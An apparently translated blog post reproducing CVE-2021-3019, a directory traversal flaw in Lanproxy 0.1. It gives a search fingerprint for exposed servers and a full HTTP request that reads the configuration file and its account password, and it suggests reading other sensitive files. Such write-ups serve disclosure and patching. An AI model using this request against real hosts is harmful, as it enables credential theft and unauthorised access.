Post

Lanproxy Directory Traversal Vulnerability Cve 2021 3019

Lanproxy Directory Traversal Vulnerability Cve 2021 3019

Lanproxy Directory Traversal Vulnerability CVE-2021-3019

Vulnerability Description

Lanproxy is an intranet penetration tool that proxys LAN personal computers and servers to the public network. It supports tcp traffic forwarding and can support any tcp upper-level protocol (access to intranet websites, local payment interface debugging, ssh access, remote desktop, etc.) This Lanproxy path traversal vulnerability (CVE-2021-3019) reads any file through…/bypass.

Vulnerability Impact

Lanproxy 0.1

Network surveying and mapping

header= “Server: LPS-0.1”

Environment construction

https://github.com/ffay/lanproxy/

Vulnerability reappears

Open the login page as follows

img

Use Burp to grab packets and send the following request

1
2
3
4
5
6
7
8
9
GET /../conf/config.properties HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

img

Successfully read the account password in the configuration file

img

Try to read other sensitive files

img

img

This post is licensed under CC BY 4.0 by the author.